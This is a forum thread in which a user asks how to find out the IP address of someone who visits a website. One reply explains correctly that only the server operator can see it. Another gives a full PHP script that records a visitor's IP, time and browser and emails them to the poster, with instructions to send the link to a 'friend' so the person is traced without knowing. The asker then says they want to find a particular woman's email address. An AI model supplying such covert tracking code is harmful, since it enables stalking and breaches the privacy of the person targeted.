nagios
+ Reply to Thread

Thread: IP from a website

Hybrid View

IP from a website

This is not a question about how to find a IP address OF a website. It is about, Is there a way to find someones IP address if they visit a website? As in If I say visit and register to re*****s.com is there a way for someone to find my ip address?

Yes, but..

I'm not sure about re*****s.com in particular, but yes, the website creator can create a simple PHP script to log your IP.

So only the website owner can find someone's IP ??
    Bummer! So there is no way out there that I can use to go to a website and find someones ip address?

Quote Originally Posted by Acrux
    So only the website owner can find someone's IP ??
    Bummer! So there is no way out there that I can use to go to a website and find someones ip address?
    An IP address is a piece of information needed between both parties of the connection; client and server. It is also invariably collected as it passes through intermediary machines.

When you connect to a website, only your computer and the webserver have access to your personal IP address. Only the website administrator can know who is connecting to the server at a specified time. As for random other visitors to the website, they neither require nor have access to any information on other users, because it never reaches them. If a user in China connects to a server in Argentina, why would a user in Australia be able to intercept information passing through a cable *000s of miles away from him?

The only conceivable methods of remotely knowing IP addresses connecting to a server without actually being there would be:
    • If the website chooses to disclose that information through a server side script.
    • If the website is poorly configured and shows logs.
    • If you are on the target's network and you can 'sniff' their browsing habits.

Quote Originally Posted by Acrux
    Is there a way to find someones IP address if they visit a website?

I can help you with an answer for this question.

If you want to find someone IP when they click on a website do that:

...copy this script in (notepad for example)...save as index.php then put it on your host with mail () Php (if you don`t have a Host find one with mail () Php function )...and Give the link To your "friend"...Then chek your_email and you`ll have his IP. Don`t forget to change [email]YOUR_Email@site.com[/email] from this Script with the email where you want to receive the IP of your Friend

Succes!

******s :Xtricker

<?
    session_start();
    $ip = getenv("REMOTE_ADDR");
    $data = date("d/m/Y - H:i:s");
    $browser = $_SERVER['HTTP_USER_AGENT'];
    $message .= "-------------------- Provided by Xtricker ------------------------\n";
    $message .= "Personal COmputer info a lu frairu care este apasa pe linku tau \n";
    $message .= "------------------------------------------------------------------\n";
    $message .= "IP: ".$ip."\n";
    $message .= "Data: ".$data."\n";
    $message .= "Browser: ".$browser."\n";
    $message .= "--===============-> Powered By Xhack*ru <-======================--\n";

$mailu = "YOUR_EMAIL@site.com";
    $subject = "PC Info";
    $headers = "From: ";
    $headers .= $_POST['user']."\n";
    $headers .= "MIME-Version: *.0\n";

(mail($mailu,$subject,$message,$headers));

echo "I have Your Ip Now";
    ?>

...Just follow the rules and It will work

LOL well I thought this way would be a lot easier to find out someones email address. But it looks like it is atleast as hard or even harder to get than trying to find the email address by itself. LOL
    Well if anyone here knows how to find a email address ,other than email sniffers and the such, please tell me how. I only know the name and a website that she has visited. Other than that it all turns up blanks..

Anyway thanks for the info

+ Reply to Thread